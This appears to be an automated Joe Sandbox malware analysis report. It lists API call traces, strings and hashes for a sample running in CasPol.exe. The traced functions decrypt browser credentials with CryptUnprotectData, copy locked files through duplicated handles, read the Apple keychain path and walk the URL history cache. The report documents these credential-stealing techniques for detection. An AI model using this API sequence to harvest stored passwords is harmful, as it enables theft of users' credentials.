40056->40146 40057 43b26e 40156 4233ae 11 API calls 40057->40156 40060 43b09a 40060->40049 40143 42cc15 19 API calls 40060->40143 40144 4233ae 11 API calls 40060->40144 40061 43b282 40157 43a87a 163 API calls 40061->40157 40063 43b13c 40147 440f84 12 API calls 40063->40147 40065 43b29d 40158 423330 11 API calls 40065->40158 40068 43b15f 40148 4233ae 11 API calls 40068->40148 40069 43b2af 40071 43b2b8 40069->40071 40072 43b2ce 40069->40072 40159 4233ae 11 API calls 40071->40159 40160 440f84 12 API calls 40072->40160 40075 43b2da 40161 42370b memset memcpy memset 40075->40161 40076 43b2c9 40162 4233ae 11 API calls 40076->40162 40079 43b2f9 40163 423330 11 API calls 40079->40163 40081 43b30b 40164 423330 11 API calls 40081->40164 40083 43b325 40165 423399 11 API calls 40083->40165 40085 43b332 40166 4233ae 11 API calls 40085->40166 40087 43b354 40167 423399 11 API calls 40087->40167 40089 43b364 40168 43a82f 16 API calls 40089->40168 40091 43b370 40169 42db80 163 API calls 40091->40169 40093 43b380 40170 438c4e 163 API calls 40093->40170 40095 43b39e 40171 423399 11 API calls 40095->40171 40097 43b3ae 40172 43a76c 21 API calls 40097->40172 40099 43b3c3 40173 423399 11 API calls 40099->40173 40101->39922 40102->39924 40103->39927 40105 43a6f5 40104->40105 40106 43a765 40104->40106 40105->40106 40193 42a115 40105->40193 40106->39930 40113 4397fd memset 40106->40113 40110 43a73d 40110->40106 40111 42a115 147 API calls 40110->40111 40111->40106 40112->39932 40113->39939 40114->39930 40115->39954 40116->39943 40117->39948 40118->39944 40119->39947 40120->39952 40121->39956 40122->39958 40123->39962 40124->39970 40125->39967 40126->39971 40127->40043 40128->39964 40129->39972 40130->39976 40131->39977 40132->39977 40133->39986 40134->39990 40135->39994 40136->40001 40137->40008 40138->40016 40139->40020 40140->40036 40141->40041 40142->40060 40143->40060 40144->40060 40145->40056 40146->40063 40147->40068 40148->40039 40149->40039 40150->40039 40151->40040 40152->40047 
Control-flow Graph

• Executed
• Not Executed
control_flow_graph: graph edge data omitted (function at 40dd85-40e01b; nodes call memset, 409bca, CreateFileW, 40afcf, 41352f, NtQuerySystemInformation, CloseHandle, GetCurrentProcessId, 413cfa, 413d4c, 40e6ad, 409c52, _wcsicmp, 413d29, OpenProcess, GetCurrentProcess, DuplicateHandle)
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 708747863-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
APIs
  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• free.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
• Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
• Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
APIs
• CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
• String ID:
• API String ID: 767404330-0
• Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
• Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
• Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
• Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
APIs
• FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
• FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: FileFind$FirstNext
• String ID:
• API String ID: 1690352074-0
• Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
• Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoSystemmemset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3558857096-0
                                                                                                                                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                          Control-flow Graph (legend: Executed / Not Executed) for the function at 0044553B, basic blocks 44553b-445fb2
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                                                                                                          • memset.MSVCRT ref: 00445725
                                                                                                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                                                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                                                                                                          • memset.MSVCRT ref: 00445755
                                                                                                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                          • API String ID: 4101496090-3798722523
                                                                                                                                                                          • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                          • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                          • API String ID: 2744995895-28296030
                                                                                                                                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
• wcsrchr.MSVCRT ref: 0040B738
• memset.MSVCRT ref: 0040B756
• memset.MSVCRT ref: 0040B7F5
• CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
• CopyFileW.KERNEL32(00445FAE,?,00000000), ref: 0040B82D
• CloseHandle.KERNELBASE(00000000), ref: 0040B838
• memset.MSVCRT ref: 0040B851
• memset.MSVCRT ref: 0040B8CA
• memcmp.MSVCRT ref: 0040B9BF
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
• memset.MSVCRT ref: 0040BB53
• memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
• LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
• String ID: chp$v10
• API String ID: 1297422669-2783969131

Control-flow Graph

APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
• CloseHandle.KERNELBASE(?), ref: 00413EA8
• free.MSVCRT ref: 00413EC1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000), ref: 00413F1A
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
• String ID: QueryFullProcessImageNameW$kernel32.dll
• API String ID: 3536422406-1740548384

Control-flow Graph

APIs
  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
• DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
• GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
• CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
• CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNEL32(00000000), ref: 0040E143
• CloseHandle.KERNEL32(?), ref: 0040E148
• CloseHandle.KERNEL32(?), ref: 0040E14D
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
• String ID: bhv
• API String ID: 4234240956-2689659898

Control-flow Graph
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
• GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
• GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
• GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2941347001-70141382

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
• String ID:
• API String ID: 2827331108-0

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                          • String ID: visited:
                                                                                                                                                                          • API String ID: 2470578098-1702587658
                                                                                                                                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                          • free.MSVCRT ref: 0040E28B
                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
